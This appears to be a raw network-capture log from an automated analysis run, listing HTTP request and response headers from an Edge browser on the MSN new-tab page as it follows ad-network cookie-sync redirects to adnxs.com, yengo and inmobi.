                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 6d 53 65 72 76 69 63 65 57 6f 72 6b 65 72 28 29 2b 74 68 69 73 2e 71 73 53 65 6c 65 63 74 65 64 50 69 76 6f 74 28 29 2b 74 68 69 73 2e 71 73 58 62 6f 78 58 54 6f 6b 65 6e 28 29 7d 71 73 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 3f 74 2b 22 3d 22 2b 28 6e 7c 7c 65 29 2b 22 26 22 3a 22 22 7d 71 73 46 72 6f 6d 44 6f 63 75 6d 65 6e 74 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 71 73 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 74 6d 6c 22 29 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 61 6e 67 22 29 2c 22 6c 61 6e 67 22 29 2b 74 68 69 73 2e 71 73 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29
                                                                                                                                                                  Data Ascii: mServiceWorker()+this.qsSelectedPivot()+this.qsXboxXToken()}qs(e,t,n){return e?t+"="+(n||e)+"&":""}qsFromDocument(){var e;return this.qs(document.getElementsByTagName("html")[0].getAttribute("lang"),"lang")+this.qs(encodeURIComponent(window.location.href)


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  38192.168.11.206196468.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC692OUTGET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
                                                                                                                                                                  Host: ib.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC1031INHTTP/1.1 302 Found
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://c.bing.com/c.gif?anx_uid=0&Red3=MSAN_pd&gdpr=0&gdpr_consent=
                                                                                                                                                                  AN-X-Request-Uuid: 34833376-3107-4218-9ebf-db08aca536c1
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  39192.168.11.2059486172.241.51.69443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC647OUTGET /sync?ssp=msn&id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: code.yengo.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:35 UTC255INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:35 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Strict-Transport-Security: max-age=15768000; includeSubdomains; preload
                                                                                                                                                                  X-Content-Type-Options: nosniff


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  40192.168.11.205967568.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC934OUTGET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:34 UTC1534INHTTP/1.1 302 Found
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://m.adnxs.com/seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D
                                                                                                                                                                  AN-X-Request-Uuid: 2cd1cbfc-f1ee-4663-8ffe-c1dc32eee23c
                                                                                                                                                                  Set-Cookie: XANDR_PANID=_rmEPyX2Y3SzfIi3Bag3Z-yhnpuyNRxQxEtot3W3en8s03JG7wnMorvH-TXz7jjzGTzDLLKeZik-idBQ28WTmvP6hFRoulWJq3H0gBpmqLM.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:34 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=7124564331408972538; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:34 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  41192.168.11.206460920.33.55.12443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC684OUTGET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1
                                                                                                                                                                  Host: sync.inmobi.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:35 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                  vary: Origin,Access-Control-Request-Method,Access-Control-Request-Headers
                                                                                                                                                                  content-length: 0
                                                                                                                                                                  date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  x-envoy-upstream-service-time: 0
                                                                                                                                                                  server: envoy
                                                                                                                                                                  connection: close


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  42192.168.11.205313368.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:35 UTC718OUTGET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:35 UTC1582INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:35 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://m.adnxs.com/bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D
                                                                                                                                                                  AN-X-Request-Uuid: 3829c9ca-fadc-4c27-aa9c-a02eb1318eea
                                                                                                                                                                  Set-Cookie: XANDR_PANID=T8uZZWPDXOikVphV8n_Q9MKss9u_RJKTOm-cP2iRJ4pWjFHj9pGBEJiJhfudih86Qo9NCHjIpVAOOEFSe6CmsCfxRF_wMc9QyoyBBLXDpt0.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:35 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:35 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=7245032462844237990; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:35 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  43192.168.11.205351768.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:35 UTC861OUTGET /mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:36 UTC1681INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:36 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://m.adnxs.com/bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D
                                                                                                                                                                  AN-X-Request-Uuid: 694e6d34-cba3-4a18-8534-0ac132bc2e2a
                                                                                                                                                                  Set-Cookie: XANDR_PANID=xBrnywoo60hGm19WqY9ZzwGfYNmZlM1DbeAEefYhAye6km-Y2uNL0BEsRyrMQUtJhqaz4qGZqvkDQaQYL2c8bVkS7XI7djyXXHW6lxZU8Bc.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=7475336897030517947; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  44192.168.11.206452768.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:35 UTC760OUTGET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:36 UTC1249INHTTP/1.1 302 Found
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:36 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://ib.adnxs.com/setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=
                                                                                                                                                                  AN-X-Request-Uuid: b5769f16-42c8-4fd2-95a8-0ddbe3c9c39c
                                                                                                                                                                  Set-Cookie: anj=dTM7k!M4/8CxrEQF']wIg2E?`l7YT4!]tbP6j2F-XstGt!@Dt#$wHZc; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  45192.168.11.206284268.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:36 UTC931OUTGET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1
                                                                                                                                                                  Host: m.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:36 UTC1532INHTTP/1.1 302 Found
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:36 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
                                                                                                                                                                  P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List,Sec-CH-UA-Arch,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Bitness
                                                                                                                                                                  Location: https://m.adnxs.com/seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D
                                                                                                                                                                  AN-X-Request-Uuid: bf28a82c-40ba-4d45-8a1a-264a76ae20d8
                                                                                                                                                                  Set-Cookie: XANDR_PANID=JSEa4dd234kAPu1jVnTpaZvuOYEdKfbT9ZIXfn7REUXJOz-vZ4JbeiVZ2dbHhlR2RrVrLPyJ_8xy5PmbbcapklKn1Hdg1NFQ7Qn6Gi8bSUk.; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; Partitioned
                                                                                                                                                                  Set-Cookie: receive-cookie-deprecation=1; SameSite=None; Path=/; Max-Age=314496000; Expires=Sat, 30-Dec-2034 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly; Partitioned
                                                                                                                                                                  Set-Cookie: uuid2=11245404123288881; SameSite=None; Path=/; Max-Age=7776000; Expires=Fri, 11-Apr-2025 06:54:36 GMT; Domain=.adnxs.com; Secure; HttpOnly
                                                                                                                                                                  X-Proxy-Origin: 185.246.209.154; 185.246.209.154; 675.bm-nginx-loadbalancer.mgmt.nym2.adnexus.net; adnxs.com


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  46192.168.11.205035068.67.160.186443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:36 UTC652OUTGET /setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                  Host: ib.adnxs.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  2025-01-11 06:54:36 UTC1427INHTTP/1.1 307 Redirection
                                                                                                                                                                  Server: nginx/1.23.4
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:36 GMT
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Cache-Control: no-store, no-cache, private
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Expires: Sat, 15 Nov 2008 16:00:00 GMT
